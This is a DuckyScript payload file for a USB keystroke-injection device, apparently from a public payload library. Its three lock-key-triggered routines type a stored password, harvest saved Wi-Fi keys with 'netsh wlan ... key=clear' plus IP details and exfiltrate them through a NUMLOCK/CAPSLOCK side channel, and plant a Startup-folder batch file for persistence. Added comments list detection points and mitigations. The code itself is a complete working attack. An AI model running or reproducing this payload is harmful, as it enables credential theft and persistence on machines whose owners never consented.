Path: blob/master/payloads/library/general/3_Payload_Menu/payload.txt
REM Three Payloads from LOCK Key Double Press.
REM Author: RootJunky
REM COMPATIBILITY: Windows
REM DuckyScript 3.0
REM
REM What this script does (as written below):
REM   FUN1 (SCROLLLOCK): types the DEFINE'd PASS value and presses ENTER.
REM   FUN2 (NUMLOCK):    opens PowerShell from the Run dialog, collects the public IP
REM                      (Invoke-WebRequest to ipinfo.io), adapter config (WMI) and the
REM                      saved Wi-Fi profile names/keys (netsh wlan ... key=clear),
REM                      stages them in %TMP%\z and, if NUMLOCK is pressed within the
REM                      5-second window, replays the file to the device as
REM                      NUMLOCK/CAPSLOCK toggles through SendKeys (keyboard lock-state
REM                      reports used as a side channel).
REM   FUN3 (CAPSLOCK):   writes rickroll.bat into the user's Startup folder
REM                      (persistence via Startup folder, runs at that user's logon).
REM Detection points visible here: powershell.exe / cmd.exe launched from the Run dialog
REM (typically explorer.exe as parent) shortly after a new HID keyboard enumerates;
REM "netsh wlan show profile ... key=clear" and Invoke-WebRequest in PowerShell
REM script-block / process-creation logs; file writes to %TMP%\z and to
REM %AppData%\Microsoft\Windows\Start Menu\Programs\Startup; a rapid burst of
REM NUMLOCK/CAPSLOCK toggles ending in SCROLLLOCK.
REM Mitigation: USB/HID device allow-listing, PowerShell constrained language mode or
REM application control, and alerting on Startup-folder writes.

REM set password
REM NOTE: PASS is stored in clear text in this file on the device; anyone who obtains
REM the device or the payload file can read it.
DEFINE PASS mypassword

REM Stop and Start the while loop during payload execution with VAR 1 and 2.
REM Each FUNCTION sets $stopstart = 2 on entry and back to 1 before returning, so the
REM WHILE ( $stopstart == 1 ) dispatch loop at the bottom keeps polling afterwards.
VAR $stopstart = 1

REM SCROLLLOCK Payload
REM Entered by the dispatch loop on the first SCROLLLOCK press; WAIT_FOR_SCROLL_CHANGE
REM then blocks until the second press (hence "double press"). LED_R signals completion.
FUNCTION FUN1()
$stopstart = 2
WAIT_FOR_SCROLL_CHANGE
DELAY 1000
STRING PASS
ENTER
LED_R
DELAY 1000
LED_OFF
$stopstart = 1
END_FUNCTION

REM NUMLOCK Payload
REM Credential/network collection plus optional exfiltration over the lock-key channel.
FUNCTION FUN2()
$stopstart = 2
WAIT_FOR_NUM_CHANGE
DELAY 500
REM Run dialog -> interactive PowerShell window (visible to the user).
GUI r
DELAY 1000
STRING Powershell
DELAY 500
ENTER
DELAY 1000
REM Outbound HTTP request to a third-party IP lookup service: network indicator.
STRING $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
ENTER
STRING $PublicIP = "Your-Public-IP-Address"
ENTER
STRING $LocalIP = "Your-Local-IP-Address"
ENTER
STRING $computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
ENTER
STRING $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
ENTER
REM Enumerates every saved WLAN profile and reads its key with key=clear; the
REM "netsh wlan show profile ... key=clear" command line is the strongest host indicator.
STRING $Wifi = (netsh wlan show profiles) | Select-String ":(.+)$" | % {$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | % {$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
ENTER
REM Collected data is staged in clear text at %TMP%\z (forensic artifact; it is only
REM deleted later inside the NUMLOCK branch, otherwise it stays on disk).
STRING $Wifi + $PublicIP + $computerPubIP + $LocalIP + $Networks.ipaddress[0] > $env:tmp\z
ENTER
STRING clear
ENTER
REM Snapshot lock state before the exfil branch may toggle NUMLOCK/CAPSLOCK/SCROLLLOCK.
SAVE_HOST_KEYBOARD_LOCK_STATE
STRING $Wifi + $PublicIP + $computerPubIP + $LocalIP + $Networks.ipaddress[0] + (echo "Press NUMLOCK now to EXFIL this data, you have 5 seconds.")
ENTER
STRING timeout 5
ENTER
DELAY 6000
STRING EXIT
REM This only runs if NUMLOCK is pressed in the 5 second window.
IF $_NUMLOCK_ON THEN
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE

REM Convert the stored credentials into CAPSLOCK and NUMLOCK values.
REM Reads %TMP%\z as raw bytes (-En by, presumably short for -Encoding byte) and, for
REM each bit MSB-first, appends %{NUMLOCK} for 1 or %{CAPSLOCK} for 0; a trailing
REM %{SCROLLLOCK} marks end of data. The resulting SendKeys string overwrites %TMP%\z.
GUI r
DELAY 100
STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,
STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else
STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
ENTER
DELAY 100

REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky.
REM SendKeys replays the toggles; the host's lock-state reports to the HID device carry
REM the bits back. rm removes the staging file afterwards (anti-forensics step).
GUI r
DELAY 100
STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;
STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
ENTER
DELAY 100

REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
REM What the device does with the received bits is not shown in this file.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_IF
LED_R
DELAY 1000
LED_OFF
$stopstart = 1
END_FUNCTION

REM Capslock payload
REM Opens cmd from the Run dialog and appends four lines to
REM %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat. The .bat is
REM the persistence artifact to look for; removing it ends the effect.
FUNCTION FUN3()
$stopstart = 2
WAIT_FOR_CAPS_CHANGE
DELAY 500
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 1000
STRING ECHO echo off > "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"
DELAY 500
ENTER
STRING ECHO mode con:cols=30 lines=10 >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"
DELAY 500
ENTER
STRING ECHO start https://youtu.be/sXwaRjU7Tj0?t=57 >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"
DELAY 500
ENTER
STRING ECHO exit >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"
DELAY 500
ENTER
STRING exit
ENTER
LED_R
DELAY 1000
LED_OFF
$stopstart = 1
END_FUNCTION

REM place all lock keys in the off state to start the payload correctly.
REM Saves the host's lock state, then presses each lock key that is currently on so the
REM dispatch loop below starts from all-off. Note: toggling lock keys at plug-in time is
REM itself observable on the host.
FUNCTION SETUP()
SAVE_HOST_KEYBOARD_LOCK_STATE
DELAY 500
IF ( $_NUMLOCK_ON == TRUE ) THEN
NUMLOCK
DELAY 500
END_IF
IF ( $_SCROLLLOCK_ON == TRUE ) THEN
SCROLLLOCK
DELAY 500
END_IF
IF ( $_CAPSLOCK_ON == TRUE ) THEN
CAPSLOCK
DELAY 500
END_IF
END_FUNCTION

REM SCROLLLOCK on to enable button description on ducky startup.
REM If SCROLLLOCK is already on when the device is plugged in, a usage MessageBox is
REM shown via a hidden PowerShell; both branches then call SETUP().
SAVE_HOST_KEYBOARD_LOCK_STATE
DELAY 1000
IF ( $_SCROLLLOCK_ON == TRUE ) THEN
DELAY 500
GUI r
DELAY 1000
STRING powershell
DELAY 500
ENTER
DELAY 1000
STRING $groups = ('CAPSLOCK = RickRoll','SCROLLLOCK = Password','NUMLOCK = WiFi Password and EXFIL','Double press any of these keys to run the payloads.')
ENTER
STRING $groups = $groups -join "`n- "
ENTER
STRING powershell -WindowStyle hidden -Command "& {[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('- $groups','DUCKY USAGE')}"
ENTER
SETUP()
ELSE IF
SETUP()
END_IF

REM Constantly monitor scrolllock, numlock, and capslock keys with a while loop.
REM The device stays resident as a keyboard and polls the host's lock state; the first
REM press of a lock key selects the payload, the WAIT_FOR_*_CHANGE inside it is the
REM second press. A device that never "finishes" is itself a sign of a scripted HID.
WHILE ( $stopstart == 1 )
REM Call FUNCTION 1 with scrolllock press.
IF ($_SCROLLLOCK_ON == TRUE) THEN
FUN1()
REM Call FUNCTION 2 with numlock press.
ELSE IF ($_NUMLOCK_ON == TRUE) THEN
FUN2()
REM Call FUNCTION 3 with capslock press.
ELSE IF ($_CAPSLOCK_ON == TRUE) THEN
FUN3()
END_IF
END_WHILE
